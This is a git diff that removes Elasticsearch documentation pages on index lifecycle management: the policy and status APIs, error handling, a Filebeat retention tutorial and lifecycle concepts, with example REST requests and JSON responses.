--- a/docs/reference/ilm/apis/get-lifecycle.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-get-lifecycle]] -=== Get lifecycle policy API -++++ -Get policy -++++ - -Retrieves a lifecycle policy. - -[[ilm-get-lifecycle-request]] -==== {api-request-title} - -`GET _ilm/policy` - -`GET _ilm/policy/` - -[[ilm-get-lifecycle-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` or -`read_ilm` or both cluster privileges to use this API. For more information, see -<>. - -[[ilm-get-lifecycle-desc]] -==== {api-description-title} - -Returns the specified policy definition. Includes the policy version and last -modified date. If no policy is specified, returns all defined policies. - -[[ilm-get-lifecycle-path-params]] -==== {api-path-parms-title} - -``:: - (Optional, string) Identifier for the policy. 
- -[[ilm-get-lifecycle-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-get-lifecycle-example]] -==== {api-examples-title} - -The following example retrieves `my_policy`: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -GET _ilm/policy/my_policy --------------------------------------------------- -// TEST[continued] - - -If the request succeeds, the body of the response contains the policy definition: - -[source,console-result] --------------------------------------------------- -{ - "my_policy": { - "version": 1, <1> - "modified_date": 82392349, <2> - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": { - "delete_searchable_snapshot": true - } - } - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"modified_date": 82392349/"modified_date": $body.my_policy.modified_date/] - -<1> The policy version is incremented whenever the policy is updated -<2> When this policy was last modified diff --git a/docs/reference/ilm/apis/get-status.asciidoc b/docs/reference/ilm/apis/get-status.asciidoc deleted file mode 100644 index ac3d1b06610..00000000000 --- a/docs/reference/ilm/apis/get-status.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-get-status]] -=== Get {ilm} status API - -[subs="attributes"] -++++ -Get {ilm} status -++++ - -Retrieves the current {ilm} ({ilm-init}) status. - -[[ilm-get-status-request]] -==== {api-request-title} - -`GET /_ilm/status` - -[[ilm-get-status-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` or -`read_ilm` or both cluster privileges to use this API. For more information, see -<>. - -[[ilm-get-status-desc]] -==== {api-description-title} - -[[ilm-operating-modes]] -Returns the status of the {ilm-init} plugin. -The `operation_mode` in the response shows one of three states: `STARTED`, `STOPPING`, or `STOPPED`. -You can start or stop {ilm-init} with the -<> and <> APIs. - -[[ilm-get-status-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-get-status-example]] -==== {api-examples-title} - -The following example gets the {ilm-init} plugin status. 
- -[source,console] --------------------------------------------------- -GET _ilm/status --------------------------------------------------- - -If the request succeeds, the body of the response shows the operation mode: - -[source,console-result] --------------------------------------------------- -{ - "operation_mode": "RUNNING" -} --------------------------------------------------- diff --git a/docs/reference/ilm/apis/ilm-api.asciidoc b/docs/reference/ilm/apis/ilm-api.asciidoc deleted file mode 100644 index 97a00e2c3fa..00000000000 --- a/docs/reference/ilm/apis/ilm-api.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[index-lifecycle-management-api]] -== {ilm-cap} APIs - -You use the following APIs to set up policies to automatically manage the index lifecycle. -For more information about {ilm} ({ilm-init}), see <>. - -[discrete] -[[ilm-api-policy-endpoint]] -=== Policy management APIs - -* <> -* <> -* <> - -[discrete] -[[ilm-api-index-endpoint]] -=== Index management APIs - -* <> -* <> -* <> - -[discrete] -[[ilm-api-management-endpoint]] -=== Operation management APIs - -* <> -* <> -* <> -* <> - - -include::put-lifecycle.asciidoc[] -include::get-lifecycle.asciidoc[] -include::delete-lifecycle.asciidoc[] - -include::move-to-step.asciidoc[] -include::remove-policy-from-index.asciidoc[] -include::retry-policy.asciidoc[] - -include::get-status.asciidoc[] -include::explain.asciidoc[] -include::start.asciidoc[] -include::stop.asciidoc[] diff --git a/docs/reference/ilm/apis/move-to-step.asciidoc b/docs/reference/ilm/apis/move-to-step.asciidoc deleted file mode 100644 index 575a405b697..00000000000 --- a/docs/reference/ilm/apis/move-to-step.asciidoc +++ /dev/null @@ -1,174 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-move-to-step]] -=== Move to lifecycle step API -++++ -Move to step -++++ - -Triggers execution of a specific step in the lifecycle policy. - -[[ilm-move-to-step-request]] -==== {api-request-title} - -`POST _ilm/move/` - -[[ilm-move-to-step-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -privileges on the indices being managed to use this API. For more information, -see <>. - -[[ilm-move-to-step-desc]] -==== {api-description-title} - -WARNING: This operation can result in the loss of data. Manually moving an index -into a specific step executes that step even if it has already been performed. -This is a potentially destructive action and this should be considered an expert -level API. - -Manually moves an index into the specified step and executes that step. -You must specify both the current step and the step to be executed in the -body of the request. - -The request will fail if the current step does not match the step currently -being executed for the index. This is to prevent the index from being moved from -an unexpected step into the next step. - -[[ilm-move-to-step-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the index. - -[[ilm-move-to-step-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[role="child_attributes"] -[[ilm-move-to-step-request-body]] -==== {api-request-body-title} - -`current_step`:: -(Required, object) -+ -.Properties of `current_step` -[%collapsible%open] -==== -`phase`:: -(Required, string) -The name of the current phase. -Must match the phase as returned by the <> API. - -`action`:: -(Required, string) -The name of the current action. 
-Must match the action as returned by the <> API. - -`name`:: -(Required, string) -The name of the current step. -Must match the step as returned by the <> API. -If {ilm-init} encounters a problem while performing an action, -it halts execution of the policy and transitions to the `ERROR` step. -If you are trying to advance a policy after troubleshooting a failure, -you specify this `ERROR` step as the current step. -For more information, see <>. - -==== - -`next_step`:: -(Required, object) -+ -.Properties of `next_step` -[%collapsible%open] -==== -`phase`:: -(Required, string) -The name of the phase that contains the action you want to perform or resume. - -`action`:: -(Required, string) -The name action you want to perform or resume. - -`name`:: -(Required, string) -The name of the step to move to and execute. - -==== - -[[ilm-move-to-step-example]] -==== {api-examples-title} - -The following example moves `my-index-000001` from the initial step to the -`forcemerge` step: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 -{ - "settings": { - "index.lifecycle.name": "my_policy" - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -POST _ilm/move/my-index-000001 -{ - "current_step": { <1> - "phase": "new", - "action": "complete", - "name": "complete" - }, - "next_step": { <2> - "phase": "warm", - "action": "forcemerge", - "name": "forcemerge" - } -} --------------------------------------------------- -// TEST[continued] -<1> The step that the index is expected to be in -<2> The step that you want to execute - -If the request succeeds, you receive the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- - -The request will fail if the index is not in the `new` phase as specified -by the `current_step`. diff --git a/docs/reference/ilm/apis/put-lifecycle.asciidoc b/docs/reference/ilm/apis/put-lifecycle.asciidoc deleted file mode 100644 index f5361820437..00000000000 --- a/docs/reference/ilm/apis/put-lifecycle.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-put-lifecycle]] -=== Create lifecycle policy API -++++ -Create policy -++++ - -Creates or updates lifecycle policy. See <> for -definitions of policy components. - -[[ilm-put-lifecycle-request]] -==== {api-request-title} - -`PUT _ilm/policy/` - -[[ilm-put-lifecycle-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -cluster privilege to use this API. You must also have the `manage` index -privilege on all indices being managed by `policy`. {ilm-init} performs -operations as the user who last updated the policy. {ilm-init} only has the -<> assigned to the user at the time of the last policy -update. - -[[ilm-put-lifecycle-desc]] -==== {api-description-title} - -Creates a lifecycle policy. If the specified policy exists, the policy is -replaced and the policy version is incremented. - -NOTE: Only the latest version of the policy is stored, you cannot revert to -previous versions. 
- -[[ilm-put-lifecycle-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the policy. - -[[ilm-put-lifecycle-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-put-lifecycle-example]] -==== {api-examples-title} - -The following example creates a new policy named `my_policy`: - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} --------------------------------------------------- - -If the request succeeds, you receive the following result: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ilm/apis/remove-policy-from-index.asciidoc b/docs/reference/ilm/apis/remove-policy-from-index.asciidoc deleted file mode 100644 index 1826dc1e6f5..00000000000 --- a/docs/reference/ilm/apis/remove-policy-from-index.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-remove-policy]] -=== Remove policy from index API -++++ -Remove policy -++++ - -Removes assigned lifecycle policies from an index or a data stream's backing -indices. - -[[ilm-remove-policy-request]] -==== {api-request-title} - -`POST /_ilm/remove` - -[[ilm-remove-policy-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -privileges on the indices being managed to use this API. For more information, -see <>. - -[[ilm-remove-policy-desc]] -==== {api-description-title} - -For indices, the remove lifecycle policy API removes the assigned lifecycle -policy and stops managing the specified index. - -For data streams, the API removes any assigned lifecycle policies from -the stream's backing indices and stops managing the indices. - -[[ilm-remove-policy-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of data streams, indices, and index aliases to target. -Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, use `_all` or `*`. - -[[ilm-remove-policy-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-remove-policy-example]] -==== {api-examples-title} - -The following example removes the assigned policy from `my-index-000001`. 
- -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 -{ - "settings": { - "index.lifecycle.name": "my_policy" - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -POST my-index-000001/_ilm/remove --------------------------------------------------- -// TEST[continued] - -If the request succeeds, you receive the following result: - -[source,console-result] --------------------------------------------------- -{ - "has_failures" : false, - "failed_indexes" : [] -} --------------------------------------------------- diff --git a/docs/reference/ilm/apis/retry-policy.asciidoc b/docs/reference/ilm/apis/retry-policy.asciidoc deleted file mode 100644 index a8d057ba114..00000000000 --- a/docs/reference/ilm/apis/retry-policy.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-retry-policy]] -=== Retry policy execution API -++++ -Retry policy -++++ - -Retry executing the policy for an index that is in the ERROR step. - -[[ilm-retry-policy-request]] -==== {api-request-title} - -`POST /_ilm/retry` - -[[ilm-retry-policy-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -privileges on the indices being managed to use this API. For more information, -see <>. - -[[ilm-retry-policy-desc]] -==== {api-description-title} - -Sets the policy back to the step where the error occurred and executes the step. -Use the <> to determine if an index is in the ERROR -step. - -[[ilm-retry-policy-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the indices to retry in comma-separated format. - -[[ilm-retry-policy-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-retry-policy-example]] -==== {api-examples-title} - -The following example retries the policy for `my-index-000001`. - -[source,js] --------------------------------------------------- -POST my-index-000001/_ilm/retry --------------------------------------------------- -// NOTCONSOLE - -If the request succeeds, you receive the following result: - -[source,js] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ilm/apis/start.asciidoc b/docs/reference/ilm/apis/start.asciidoc deleted file mode 100644 index 5c79839a415..00000000000 --- a/docs/reference/ilm/apis/start.asciidoc +++ /dev/null @@ -1,88 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-start]] -=== Start {ilm} API - -[subs="attributes"] -++++ -Start {ilm} -++++ - -Start the {ilm} ({ilm-init}) plugin. - -[[ilm-start-request]] -==== {api-request-title} - -`POST /_ilm/start` - -[[ilm-start-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -cluster privilege to use this API. For more information, see -<>. - -[[ilm-start-desc]] -==== {api-description-title} - -Starts the {ilm-init} plugin if it is currently stopped. {ilm-init} is started -automatically when the cluster is formed. 
Restarting {ilm-init} is only -necessary if it has been stopped using the <>. - -[[ilm-start-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-start-example]] -==== {api-examples-title} - -The following example starts the {ilm-init} plugin. - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 - -POST _ilm/stop --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -POST _ilm/start --------------------------------------------------- -// TEST[continued] - -If the request succeeds, you receive the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- diff --git a/docs/reference/ilm/apis/stop.asciidoc b/docs/reference/ilm/apis/stop.asciidoc deleted file mode 100644 index 5eb886437f6..00000000000 --- a/docs/reference/ilm/apis/stop.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-stop]] -=== Stop {ilm} API - -[subs="attributes"] -++++ -Stop {ilm} -++++ - -Stop the {ilm} ({ilm-init}) plugin. - -[[ilm-stop-request]] -==== {api-request-title} - -`POST /_ilm/stop` - -[[ilm-stop-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -cluster privilege to use this API. For more information, see -<>. - -[[ilm-stop-desc]] -==== {api-description-title} - -Halts all lifecycle management operations and stops the {ilm-init} plugin. This -is useful when you are performing maintenance on the cluster and need to prevent -{ilm-init} from performing any actions on your indices. - -The API returns as soon as the stop request has been acknowledged, but the -plugin might continue to run until in-progress operations complete and the plugin -can be safely stopped. Use the <> API to see -if {ilm-init} is running. - -[[ilm-stop-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-stop-example]] -==== {api-examples-title} - -The following example stops the {ilm-init} plugin. 
- -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 --------------------------------------------------- -// TEST - -////////////////////////// - -[source,console] --------------------------------------------------- -POST _ilm/stop --------------------------------------------------- -// TEST[continued] - -If the request does not encounter errors, you receive the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -POST _ilm/start --------------------------------------------------- -// TEST[continued] - -////////////////////////// diff --git a/docs/reference/ilm/error-handling.asciidoc b/docs/reference/ilm/error-handling.asciidoc deleted file mode 100644 index 500ac99ec12..00000000000 --- a/docs/reference/ilm/error-handling.asciidoc +++ /dev/null @@ -1,149 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[index-lifecycle-error-handling]] -== Resolve lifecycle policy execution errors - -When {ilm-init} executes a lifecycle policy, it's possible for errors to occur -while performing the necessary index operations for a step. -When this happens, {ilm-init} moves the index to an `ERROR` step. -If {ilm-init} cannot resolve the error automatically, execution is halted -until you resolve the underlying issues with the policy, index, or cluster. - -For example, you might have a `shrink-index` policy that shrinks an index to four shards once it -is at least five days old: - -[source,console] --------------------------------------------------- -PUT _ilm/policy/shrink-index -{ - "policy": { - "phases": { - "warm": { - "min_age": "5d", - "actions": { - "shrink": { - "number_of_shards": 4 - } - } - } - } - } -} --------------------------------------------------- -// TEST - -There is nothing that prevents you from applying the `shrink-index` policy to a new -index that has only two shards: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "index.number_of_shards": 2, - "index.lifecycle.name": "shrink-index" - } -} --------------------------------------------------- -// TEST[continued] - -After five days, {ilm-init} attempts to shrink `my-index-000001` from two shards to four shards. -Because the shrink action cannot _increase_ the number of shards, this operation fails -and {ilm-init} moves `my-index-000001` to the `ERROR` step. 
- -You can use the <> to get information about -what went wrong: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_ilm/explain --------------------------------------------------- -// TEST[continued] - -Which returns the following information: - -[source,console-result] --------------------------------------------------- -{ - "indices" : { - "my-index-000001" : { - "index" : "my-index-000001", - "managed" : true, - "policy" : "shrink-index", <1> - "lifecycle_date_millis" : 1541717265865, - "age": "5.1d", <2> - "phase" : "warm", <3> - "phase_time_millis" : 1541717272601, - "action" : "shrink", <4> - "action_time_millis" : 1541717272601, - "step" : "ERROR", <5> - "step_time_millis" : 1541717272688, - "failed_step" : "shrink", <6> - "step_info" : { - "type" : "illegal_argument_exception", <7> - "reason" : "the number of target shards [4] must be less that the number of source shards [2]" - }, - "phase_execution" : { - "policy" : "shrink-index", - "phase_definition" : { <8> - "min_age" : "5d", - "actions" : { - "shrink" : { - "number_of_shards" : 4 - } - } - }, - "version" : 1, - "modified_date_in_millis" : 1541717264230 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:no way to know if we will get this response immediately] - -<1> The policy being used to manage the index: `shrink-index` -<2> The index age: 5.1 days -<3> The phase the index is currently in: `warm` -<4> The current action: `shrink` -<5> The step the index is currently in: `ERROR` -<6> The step that failed to execute: `shrink` -<7> The type of error and a description of that error. -<8> The definition of the current phase from the `shrink-index` policy - -To resolve this, you could update the policy to shrink the index to a single shard after 5 days: - -[source,console] --------------------------------------------------- -PUT _ilm/policy/shrink-index -{ - "policy": { - "phases": { - "warm": { - "min_age": "5d", - "actions": { - "shrink": { - "number_of_shards": 1 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -=== Retrying failed lifecycle policy steps - -Once you fix the problem that put an index in the `ERROR` step, -you might need to explicitly tell {ilm-init} to retry the step: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_ilm/retry --------------------------------------------------- -// TEST[skip:we can't be sure the index is ready to be retried at this point] - -{ilm-init} subsequently attempts to re-run the step that failed. -You can use the <> to monitor the progress. diff --git a/docs/reference/ilm/example-index-lifecycle-policy.asciidoc b/docs/reference/ilm/example-index-lifecycle-policy.asciidoc deleted file mode 100644 index 9b819e64e1f..00000000000 --- a/docs/reference/ilm/example-index-lifecycle-policy.asciidoc +++ /dev/null @@ -1,165 +0,0 @@ -[role="xpack"] - -[[example-using-index-lifecycle-policy]] -=== Tutorial: Manage {filebeat} time-based indices -++++ -Manage {filebeat} time-based indices -++++ - -With {ilm} ({ilm-init}), you can create policies that perform actions automatically -on indices as they age and grow. {ilm-init} policies help you to manage -performance, resilience, and retention of your data during its lifecycle. This tutorial shows -you how to use {kib}’s *Index Lifecycle Policies* to modify and create {ilm-init} -policies. 
You can learn more about all of the actions, benefits, and lifecycle -phases in the <>. - - -[discrete] -[[example-using-index-lifecycle-policy-scenario]] -==== Scenario - -You’re tasked with sending syslog files to an {es} cluster. This -log data has the following data retention guidelines: - -* Keep logs on hot data nodes for 30 days -* Roll over to a new index if the size reaches 50GB -* After 30 days: -** Move the logs to warm data nodes -** Set <> to 1 -** <> multiple index segments to free up the space used by deleted documents -* Delete logs after 90 days - - -[discrete] -[[example-using-index-lifecycle-policy-prerequisites]] -==== Prerequisites - -To complete this tutorial, you'll need: - -* An {es} cluster with hot and warm nodes configured for shard allocation -awareness. - -** {ess}: -Choose the Elastic Stack and then the {cloud}/ec-getting-started-profiles.html#ec-getting-started-profiles-hot-warm[hot-warm architecture] hardware profile. - -** Self-managed cluster: -Add node attributes as described for {ref}/shard-allocation-filtering.html[shard allocation filtering]. -+ -For example, you can set this in your `elasticsearch.yml` for each data node: -+ -[source,yaml] --------------------------------------------------------------------------------- -node.attr.data: "warm" --------------------------------------------------------------------------------- - -* A server with {filebeat} installed and configured to send logs to the `elasticsearch` -output as described in the {filebeat-ref}/filebeat-installation-configuration.html[{filebeat} quick start]. - -[discrete] -[[example-using-index-lifecycle-policy-view-fb-ilm-policy]] -==== View the {filebeat} {ilm-init} policy - -{filebeat} includes a default {ilm-init} policy that enables rollover. {ilm-init} -is enabled automatically if you’re using the default `filebeat.yml` and index template. - -To view the default policy in {kib}: - -. Go to Management and select *Index Lifecycle Policies*. -. Search for _filebeat_ -. Select the _filebeat-version_ policy. - -This policy initiates the rollover action when the index size reaches 50GB or -becomes 30 days old. - -[role="screenshot"] -image::images/ilm/tutorial-ilm-hotphaserollover-default.png["Default policy"] - - -[discrete] -==== Modify the policy - -The default policy is enough to prevent the creation of many tiny daily indices. -You can modify the policy to meet more complex requirements. - -. Activate the warm phase. -+ --- -[role="screenshot"] -image::images/ilm/tutorial-ilm-modify-default-warm-phase-rollover.png["Modify to add warm phase"] - -.. Set one of the following options to control when the index moves to the warm phase: - -*** Provide a value for *Timing for warm phase*. Setting this to *15* keeps the -indices on hot nodes for a range of 15-45 days, depending on when the initial -rollover occurred. - -*** Enable *Move to warm phase on rollover*. The index might move to the warm phase -more quickly than intended if it reaches the *Maximum index size* before the -the *Maximum age*. - -.. In the *Select a node attribute to control shard allocation* dropdown, select -*data:warm(2)* to migrate shards to warm data nodes. - -.. Change *Number of replicas* to *1*. - -.. Enable *Force merge data* and set *Number of segments* to *1*. - -NOTE: When rollover is enabled in the hot phase, action timing in the other phases -is based on the rollover date. --- - -. Activate the delete phase and set *Timing for delete phase* to *90* days. 
-+ -[role="screenshot"] -image::images/ilm/tutorial-ilm-delete-rollover.png["Add a delete phase"] - -[discrete] -==== Create a custom policy - -If meeting a specific retention time period is most important, you can create a -custom policy. For this option, you use {filebeat} daily indices without -rollover. - -To create a custom policy: - -. Go to Management and select *Index Lifecycle Policies*. -. Click *Create policy*. -. Activate the warm phase and configure it as follows: -+ --- -**Timing for warm phase**: 30 days from index creation - -**Node attribute**: `data:warm` - -**Number of replicas**: 1 - -**Force merge data**: enable - -**Number of segments**: 1 - -[role="screenshot"] -image::images/ilm/tutorial-ilm-custom-policy.png["Modify the custom policy to add a warm phase"] --- - -. Activate the delete phase and set the timing to 90 days. -+ -[role="screenshot"] -image::images/ilm/tutorial-ilm-delete-phase-creation.png["Delete phase"] - -To configure the index to use the new policy: - -. Go to Management and select *Index Lifecycle Policies*. -. Find your {ilm-init} policy and click its *Actions* link. -. Choose *Add policy to index template*. -. Select your {filebeat} index template name from the *Index template* list. For example, `filebeat-7.5.x`. -. Click *Add Policy* to save the changes. -+ -NOTE: If you initially used the default {filebeat} {ilm-init} policy, you will -see a notice that the template already has a policy associated with it. Confirm -that you want to overwrite that configuration. - -When you change the policy associated with the index template, the active -index will continue to use the policy it was associated with at index creation -unless you manually update it. The next new index will use the updated policy. -For more reasons that your {ilm-init} policy changes might be delayed, see -<>. diff --git a/docs/reference/ilm/ilm-actions.asciidoc b/docs/reference/ilm/ilm-actions.asciidoc deleted file mode 100644 index 4d04e38a400..00000000000 --- a/docs/reference/ilm/ilm-actions.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-actions]] -== Index lifecycle actions - -<>:: -Move shards to nodes with different performance characteristics -and reduce the number of replicas. - -<>:: -Permanently remove the index. - -<>:: -Reduce the number of index segments and purge deleted documents. -Makes the index read-only. - -<>:: -Freeze the index to minimize its memory footprint. - -<>:: -Move the index shards to the <> that corresponds -to the current {ilm-init} phase. - -<>:: -Block write operations to the index. - -<>:: -Remove the index as the write index for the rollover alias and -start indexing to a new index. - -<>:: -beta:[] -Take a snapshot of the managed index in the configured repository -and mount it as a searchable snapshot. - -<>:: -Lower the priority of an index as it moves through the lifecycle -to ensure that hot indices are recovered first. - -<>:: -Reduce the number of primary shards by shrinking the index into a new index. - -<>:: -Convert a follower index to a regular index. -Performed automatically before a rollover, shrink, or searchable snapshot action. - -<>:: -Ensure that a snapshot exists before deleting the index. 
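To see how these actions fit together, the following is a sketch of a policy that combines several of them; the policy name, thresholds, and timings are illustrative assumptions, not recommendations:

[source,console]
--------------------------------------------------
PUT _ilm/policy/example-combined-policy
{
  "policy": {
    "phases": {
      "hot": {
        "actions": {
          "set_priority": { "priority": 100 },
          "rollover": { "max_size": "50GB", "max_age": "30d" }
        }
      },
      "warm": {
        "min_age": "7d",
        "actions": {
          "shrink": { "number_of_shards": 1 },
          "forcemerge": { "max_num_segments": 1 }
        }
      },
      "delete": {
        "min_age": "30d",
        "actions": {
          "delete": {}
        }
      }
    }
  }
}
--------------------------------------------------
// TEST[skip:illustrative example only]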
- -include::actions/ilm-allocate.asciidoc[] -include::actions/ilm-delete.asciidoc[] -include::actions/ilm-forcemerge.asciidoc[] -include::actions/ilm-freeze.asciidoc[] -include::actions/ilm-migrate.asciidoc[] -include::actions/ilm-readonly.asciidoc[] -include::actions/ilm-rollover.asciidoc[] -include::actions/ilm-searchable-snapshot.asciidoc[] -include::actions/ilm-set-priority.asciidoc[] -include::actions/ilm-shrink.asciidoc[] -include::actions/ilm-unfollow.asciidoc[] -include::actions/ilm-wait-for-snapshot.asciidoc[] diff --git a/docs/reference/ilm/ilm-and-snapshots.asciidoc b/docs/reference/ilm/ilm-and-snapshots.asciidoc deleted file mode 100644 index 8682391df99..00000000000 --- a/docs/reference/ilm/ilm-and-snapshots.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[index-lifecycle-and-snapshots]] -== Restore a managed data stream or index - -When you restore a managed index or a data stream with managed backing indices, -{ilm-init} automatically resumes executing the restored indices' policies. -A restored index's `min_age` is relative to when it was originally created or rolled over, -not its restoration time. -Policy actions are performed on the same schedule whether or not -an index has been restored from a snapshot. -If you restore an index that was accidentally deleted half way through its month long lifecycle, -it proceeds normally through the last two weeks of its lifecycle. - -In some cases, you might want to prevent {ilm-init} from immediately executing -its policy on a restored index. -For example, if you are restoring an older snapshot you might want to -prevent it from rapidly progressing through all of its lifecycle phases. -You might want to add or update documents before it's marked read-only or shrunk, -or prevent the index from being immediately deleted. - -To prevent {ilm-init} from executing a restored index's policy: - -1. Temporarily <>. This pauses execution of _all_ {ilm-init} policies. -2. Restore the snapshot. -3. <> from the index or perform whatever actions you need to - before {ilm-init} resumes policy execution. -4. <> to resume policy execution. diff --git a/docs/reference/ilm/ilm-concepts.asciidoc b/docs/reference/ilm/ilm-concepts.asciidoc deleted file mode 100644 index 5ff31b5b34b..00000000000 --- a/docs/reference/ilm/ilm-concepts.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-concepts]] -== {ilm-init} concepts - -++++ -Concepts -++++ - -* <> -* <> -* <> - -include::ilm-index-lifecycle.asciidoc[] -include::index-rollover.asciidoc[] -include::update-lifecycle-policy.asciidoc[] \ No newline at end of file diff --git a/docs/reference/ilm/ilm-index-lifecycle.asciidoc b/docs/reference/ilm/ilm-index-lifecycle.asciidoc deleted file mode 100644 index 30b6aaf7862..00000000000 --- a/docs/reference/ilm/ilm-index-lifecycle.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-index-lifecycle]] -=== Index lifecycle -++++ -Index lifecycle -++++ - -{ilm-init} defines four index lifecycle _phases_: - -* **Hot**: The index is actively being updated and queried. -* **Warm**: The index is no longer being updated but is still being queried. -* **Cold**: The index is no longer being updated and is seldom queried. The -information still needs to be searchable, but it's okay if those queries are -slower. -* **Delete**: The index is no longer needed and can safely be removed. 
